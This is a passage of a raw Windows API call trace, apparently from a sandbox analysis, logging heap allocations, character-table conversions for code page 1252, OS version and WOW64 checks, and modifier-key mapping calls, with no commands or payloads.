(HeapHandle=0xc60000, Flags=0x8, Size=0xd2) returned 0xc82d30 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x7c) returned 0xc82e10 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x36) returned 0xc82e98 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3a) returned 0xc72168 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x90) returned 0xc82ed8 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x24) returned 0xc7c010 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x30) returned 0xc7c630 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x36) returned 0xc82f70 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x48) returned 0xc781f0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x52) returned 0xc82fb0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3c) returned 0xc721b0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x82) returned 0xc83010 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2e) returned 0xc7c668 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x1e) returned 0xc7fb70 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2c) returned 0xc7c6a0 [0260.994] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x54) returned 0xc840a0 [0260.995] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x52) returned 0xc84100 [0260.995] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x2a) returned 0xc7c6d8 [0260.995] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x3c) returned 0xc721f8 [0260.995] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x54) returned 0xc84160 [0260.995] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x24) returned 0xc7c040 [0260.995] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x30) returned 0xc7c710 [0260.995] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x8c) returned 0xc830a0 [0260.995] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc835b0 | out: hHeap=0xc60000) returned 1 [0260.996] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x80) returned 0xc83138 [0260.996] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x8, Size=0x800) returned 0xc831c0 [0260.996] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0260.996] GetLastError () returned 0x0 [0260.996] SetLastError (dwErrCode=0x0) [0260.996] GetLastError () returned 0x0 [0260.996] SetLastError (dwErrCode=0x0) [0260.996] GetLastError () returned 0x0 [0260.996] SetLastError (dwErrCode=0x0) [0260.996] GetACP () returned 0x4e4 [0260.996] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x220) returned 0xc839c8 [0260.996] GetLastError () returned 0x0 [0260.996] SetLastError (dwErrCode=0x0) [0260.996] IsValidCodePage (CodePage=0x4e4) returned 1 [0260.996] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x93fde4 | out: lpCPInfo=0x93fde4) returned 1 [0260.996] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x93f8ac | out: lpCPInfo=0x93f8ac) returned 1 [0260.996] GetLastError () returned 0x0 [0260.996] SetLastError (dwErrCode=0x0) [0260.997] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x93fcc0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0260.997] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x93fcc0, cbMultiByte=256, lpWideCharStr=0x93f628, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0260.997] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x93f8c0 | out: lpCharType=0x93f8c0) returned 1 [0260.997] GetLastError () returned 0x0 [0260.997] SetLastError (dwErrCode=0x0) [0260.998] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x93fcc0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0260.998] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x93fcc0, cbMultiByte=256, lpWideCharStr=0x93f5f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0260.999] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0260.999] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x93f3e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0260.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x93fbc0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¼ibHüý\x93", lpUsedDefaultChar=0x0) returned 256 [0260.999] GetLastError () returned 0x0 [0260.999] SetLastError (dwErrCode=0x0) [0260.999] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x93fcc0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0260.999] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x93fcc0, cbMultiByte=256, lpWideCharStr=0x93f618, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā") returned 256 [0260.999] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0260.999] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x93f408, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0260.999] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x93fac0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¼ibHüý\x93", lpUsedDefaultChar=0x0) returned 256 [0260.999] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0260.999] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0260.999] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.000] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.000] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x3c) returned 0xc72240 [0261.000] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.000] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73300 [0261.000] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc72a80 [0261.000] GetVersionExW (in: lpVersionInformation=0x93fcd8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x93fcd8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0261.000] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73300 | out: hHeap=0xc60000) returned 1 [0261.000] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc7fbc0 [0261.000] GetCurrentProcess () returned 0xffffffff [0261.000] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x93fe28 | out: Wow64Process=0x93fe28) returned 1 [0261.000] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0261.001] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0261.001] GetNativeSystemInfo (in: lpSystemInfo=0x93fdf4 | out: lpSystemInfo=0x93fdf4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0261.001] FreeLibrary (hLibModule=0x75990000) returned 1 [0261.001] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.001] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc73300 [0261.002] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84038 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73330 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84048 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73348 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84058 [0261.002] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73360 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84068 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73378 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc84078 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73390 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85088 [0261.002] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733a8 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850b0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733c0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850c0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733d8 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850d0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc733f0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850e0 [0261.003] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0261.003] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0261.003] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0261.003] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0261.003] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0261.003] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73408 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc850f0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854b0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85100 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854c8 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85110 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854e0 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85120 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc854f8 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85130 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85510 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85140 [0261.003] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85528 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85150 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85540 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85160 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85558 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85170 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85570 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85180 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85190 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85588 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851a0 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855a0 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851b0 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855b8 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851c0 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855d0 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851d0 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc855e8 [0261.004] RtlAllocateHeap 